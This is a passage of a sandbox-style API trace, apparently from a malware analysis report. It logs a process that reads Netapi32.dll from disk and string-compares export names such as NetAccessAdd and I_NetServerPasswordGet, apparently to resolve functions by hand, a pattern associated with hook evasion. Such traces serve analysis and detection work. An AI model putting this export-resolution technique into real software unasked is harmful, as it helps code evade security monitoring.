(lpString1="DnsDhcpRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiFree") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0234.897] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsCancelQuery") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsCopyStringEx") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsCreateStringCopy") returned 1 [0234.898] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsDeRegisterLocal") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsDhcpRegisterAddrs") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsDhcpRegisterHostAddrs") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsDhcpRegisterInit") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRegisterTerm", lpString2="DnsDhcpRegisterTerm") returned 0 [0234.899] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="AddRefQueryBlobEx") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="BreakRecordsIntoBlob") returned 1 [0234.899] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="Coalesce_UpdateNetVersion") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="CombineRecordsInBlob") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DeRefQueryBlobEx") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DelaySortDAServerlist") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAcquireContextHandle_A") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAcquireContextHandle_W") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAllocateRecord") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiAlloc") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiAllocZero") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiFree") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiHeapReset") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiRealloc") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsApiSetDebugGlobals") returned 1 [0234.900] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAsyncRegisterInit") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsAsyncRegisterTerm") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsCancelQuery") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsCopyStringEx") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsCreateReverseNameStringForIpAddress") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsCreateStandardDnsNameCopy") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsCreateStringCopy") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsDeRegisterLocal") returned 1 [0234.901] lstrcmpA (lpString1="DnsDhcpRemoveRegistrations", lpString2="DnsDhcpRegisterAddrs") returned 1 [0234.915] GetProcessHeap () returned 0x560000 [0234.915] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x3aed010 | out: hHeap=0x560000) returned 1 [0234.915] GetProcessHeap () returned 0x560000 [0234.915] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579370 [0234.916] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0234.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0234.920] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0234.920] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0234.921] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0235.220] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0235.220] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0235.220] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0235.220] GetProcessHeap () returned 0x560000 [0235.220] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13b00) returned 0x2db5030 [0235.220] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0235.221] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0235.221] CloseHandle (hObject=0x17c) returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0235.221] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0235.222] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0235.223] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0235.224] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0235.225] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0235.226] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0235.227] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0235.228] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0235.229] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0235.230] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0235.230] lstrcmpA 